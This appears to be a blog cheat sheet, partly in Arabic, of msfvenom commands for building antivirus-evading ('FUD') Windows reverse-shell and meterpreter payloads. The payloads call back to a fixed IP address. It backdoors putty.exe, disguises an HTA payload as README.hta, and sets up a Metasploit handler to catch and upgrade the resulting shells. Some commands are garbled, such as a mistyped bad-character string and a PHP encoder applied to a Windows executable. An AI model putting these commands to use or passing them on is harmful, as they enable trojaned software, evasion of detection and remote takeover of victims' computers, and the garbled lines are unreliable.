Metasploit All Payload Create

 MSF METASPLOITS ENCRYPT FUD PAYLOAD CREATE


msfvenom -p windows/x64/shell_reverse_tcp LHOST=165.227.31.192 LPORT=22649 -f exe > payload.exe


msfvenom -p windows/shell_reverse_tcp LHOST=165.227.31.192 LPORT=22649 -fc -b \xOOxOa\xOb>payload.exe


3/68 detections - custom x64 binary



msfvenom -p windows/x64/shell_reverse_tcp LHOST=165.227.31.192 LPORT=22649 -f c -b \x00\x0a\x0d


msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=165.227.31.192 LPORT=22649 -f raw -o payload.bin



hta fud sellcode test...


msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=165.227.31.192 LPORT=22649 -f hta-psh -o README.hta

2) ثُمَّ أَنشَأْنَا #msfListener عن طريق الاوامر التالية:

use exploit/multi/handler

set PAYLOAD windows/shell/reverse_tcp

set LHOST 165.227.31.192

set LPORT 22649

set ExitOnSession false

exploit -j

3) في الخطوة الثالثة حملنا الملف و ضغطنا عليه ثم تحصلنا على اتصال من نوع command #shell .

4) وكما ذكرنا يمكنك ترقية الSHELL بواسطة هذا الامر:

sessions -u 1 (رقم  session)

==========


bind fud 

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=165.227.31.192 LPORT=22649 -x putty.exe -k -f exe -o putty2.exe


Creating stageless shellcode with MSF-Venom c2


msfvenom -p windows/x64/meterpreter_reverse_https LHOST=165.227.31.192 LPORT=22649 -f c --arch x64 --platform windows -o /tmp/meterx64.c



Create a HTTP server with one command



Python 2 — python -m SimpleHTTPServer 8000

Python 3 — python -m http.server 8000

Then open a web browser at http://localhost:8000/.


python -m http.server 8080 --bind $Local_Host



metasploit enccoder fud coder


msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=165.227.31.192 LPORT=22649 -e php/base64 -o /Home/Desktop/Trojan.exe



Previous
Next Post »